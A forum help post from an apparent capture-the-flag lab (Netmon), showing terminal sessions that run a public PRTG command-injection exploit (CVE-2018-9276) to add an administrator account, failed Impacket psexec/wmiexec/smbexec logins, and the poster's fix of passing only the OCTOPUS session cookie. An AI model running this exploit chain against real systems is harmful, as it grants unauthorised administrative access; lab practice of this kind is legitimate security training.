NETMON PRTG Network monitor RCE Exploit along with psexec.py issue

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo ./new.sh -u http://10.10.10.152 -c " _ga=GA1.4.559325993.1627923139; _gid=GA1.4.89938601.1627923139; OCTOPUS1813713946=e0Y4OEYwQjMzLTI3QTctNEYyOC05QUE5LTYxNENFRjhFMDlBQX0%3D"

[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019 [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0 lorn3m4lvo@protonmail.com [*]
[+]#########################################################################[+]
[*] Vendor Homepage: Discover the 3 Paessler PRTG monitoring solutions [*]
[*] Version: 18.2.38 [*]
[*] CVE: CVE-2018-9276 [*]
[*] Reference: PRTG < 18.2.39 Command Injection Vulnerability – CodeWatch [*]
[+]#########################################################################[+]

login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.

run the script to create a new user ‘pentest’ in the administrators group with password ‘P3nT3st!’

[+]#########################################################################[+]

[*] file created
[*] sending notification wait…

[*] adding a new user ‘pentest’ with password ‘P3nT3st’
[*] sending notification wait…

[*] adding a user pentest to the administrators group
[*] sending notification wait…

[*] exploit completed new user ‘pentest’ with password ‘P3nT3st!’ created have fun!

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo psexec.py pentest:'P3nT3st!'@10.10.10.152
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo wmiexec.py pentest:'P3nT3st!'@10.10.10.152 1 ⨯
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo psexec.py pentest:'P3nT3st'@10.10.10.152 1 ⨯
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo wmiexec.py pentest:'P3nT3st!'@10.10.10.152 1 ⨯
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

┌──(kali㉿kali)-[~/Downloads]
└─$ sudo smbexec.py pentest:'P3nT3st!'@10.10.10.152 1 ⨯
Impacket v0.9.24.dev1+20210726.180101.1636eaab - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

So, as you can read, it seems to be an authentication issue, but the creds from the exploit do not seem to be working.

Please help.


I figured out the issue. The issue is what I put for the exploit layout. For the exploit, all you need is the OCTOPUS cookie itself.

WRONG: sudo ./new.sh -u http://10.10.10.152 -c " _ga=GA1.4.559325993.1627923139; _gid=GA1.4.89938601.1627923139; OCTOPUS1813713946=e0Y4OEYwQjMzLTI3QTctNEYyOC05QUE5LTYxNENFRjhFMDlBQX0%3D"

sudo ./new.sh -u http://10.10.10.152 -c "e0Q5NjIyRkFGLUJCNjMtNEVGOS04MTQ4LUVDRDc4NEYwQ0E1M30%3D"